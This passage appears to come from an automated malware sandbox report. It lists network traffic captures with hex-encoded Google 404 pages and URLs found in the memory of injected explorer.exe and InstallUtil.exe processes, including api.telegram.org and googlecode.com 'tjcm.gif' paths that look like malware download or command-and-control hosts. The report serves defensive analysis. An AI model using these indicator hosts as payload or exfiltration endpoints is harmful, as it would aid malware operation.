6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:53 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20

Source: InstallUtil.exe, 00000015.00000002.3271221275.0000000002FD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/Data
Source: explorer.exe, 00000004.00000002.3260042369.000000000068C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gif
Source: explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifCh
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifMR
Source: explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifQh
Source: explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifZR
Source: explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifc
Source: explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifcP
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifdR(
Source: explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.giffh
Source: explorer.exe, 00000004.00000002.3260042369.000000000068C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/files/tjcm.gifh
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/googlecode.com/
Source: explorer.exe, 00000004.00000003.2819534174.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd01.googlecode.com/l
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/
Source: explorer.exe, 00000004.00000002.3260042369.0000000000677000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2819433944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif%Rk
Source: explorer.exe, 00000004.00000002.3260042369.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gif.hU
Source: explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifMR
Source: explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifWR%
Source: explorer.exe, 00000004.00000003.2819844553.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifc
Source: explorer.exe, 00000004.00000002.3260042369.00000000006BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://codecmd02.googlecode.com/files/tjcm.gifcH
